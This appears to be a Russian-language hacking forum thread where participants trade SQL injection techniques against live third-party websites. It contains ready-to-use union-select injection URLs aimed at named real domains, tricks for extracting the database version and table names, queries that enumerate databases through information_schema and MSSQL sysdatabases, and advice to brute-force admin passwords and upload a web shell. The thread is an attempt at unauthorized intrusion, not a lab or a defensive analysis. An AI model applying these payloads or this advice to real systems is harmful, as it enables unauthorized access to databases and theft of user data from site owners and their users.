что бы тебе тянуть брутом базу юзверей..тебе надо добратся до таблички и до колонок сперва... так как я сказал что версия базы 4-я и информатион схемы нет..так что подбери сначала имена табличек и колонок нужные..и только потом думай про дамп базы...вариантов несколько..ты подбираешь пасс админа и через админку заливаешь шелл ..а там уже и доступ прямой к базе..либо используешь какую нибудь тулзу для скулей..например сипт или что быстрее будет, тулзу от Пашкелы...
Делаю сканирование на уязвимости, используя OWASP Joomla! Vulnerability Scanner v0.0.3-a. Если верить скрипту, то Я не понимаю как он понял, что можно провести Blind SQL в параметре id.
Ты думаешь я просто так написал limit 1,1? Твой запрос по логике и должен проходить и выдать нам результат идентичный /index.php?ap=2956775 Если честно не смотрел твой сайт и вариантов тут может быть просто масса, но догадываюсь в чём проблема. Покажи мне как с помощью параметра передаваемого в гет ты можешь повлиять на контент страницы и я покажу тебе как сделать вывод Это типо пища для ума
он слишком болтливый. Найти то что мне нужно займёт уйму времени (всего то пару тысяч строк кода на перле). Может я не совсем точно выразился, меня не интересует как он нашёл, а если там injection. Я не вижу inj, но скрипт даёт повод для сомнений. Поэтому решил спросить у вас.
Блиииин) Сейчас ковырял сайт, который durito выложил, нашел другую инъекцию, замутил оригинальный запрос, но забыл что там 4.0 и не работают подзапросы Code: http://www.soulmades.com.au/index.php?list=profile&method=modify_form&id=-1+union+select+@a:=mid(version(),1,1),find_in_set(@a,'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z, ,.,-'),3,4,find_in_set(@a,'1,2,3,4,5,6,7,8,9,0'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80 Мб кому-нибудь пригодится) Определяем переменную @a:=mid(version(),1,1) И в зависимости от ее значения, получаем номер символа в day (если принадлежит [a-z .-]), либо в Children (если принадлежит [0-9]) Префикс у таблиц скорее всего soul_, потому что есть таблица soul_photo PS: наконец-то нашел хоть какое-нибудь применение пользовательских переменных в инъекциях)
Очень часто этот скрипт ошибается, особенно когда нет ошибки при наборе неправильно/несуществуюешего урла А проверить - да, только ручками, мало ли что скрипты выдают
Наверное тупой вопрос, но подскажите как через SQL инъекцию вывести список баз данных на сервере? Ну INFORMATION_SCHEMA это ясно, а вот как узнать другие?
И что, в бд примерно 40 табл, group_concat() ограничен 512 символами. 40 табл находится в базе bla1. Просто тупо, bla1 40 раз повторится. Не вариант. // 2Konqi, даже так. // manual говорит что 512.
А если так select concat_ws(0x3A3a,table_schema,table_name,column_name) from information_schema.columns limit 1,1 и лимитом перебирать? Будет выводить к какой базе относится таблица и поле, так и узнаем все базы на серваке. Или я не правильно понял вопрос
(MSSQL) Code: use master select * from sysdatabases или Code: select name from master..sysdatabases (MySQL) Code: SELECT CATALOG_NAME AS DataBaseName FROM INFORMATION_SCHEMA.SCHEMATA или Code: SELECT name AS DATABASENAME FROM master.dbo.sysdatabases
can'not get tables.... Code: http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,unhex%28hex%28group_concat%28table_name%29%29%29,4,5,6,7,8,9+from+information_schema.tables--
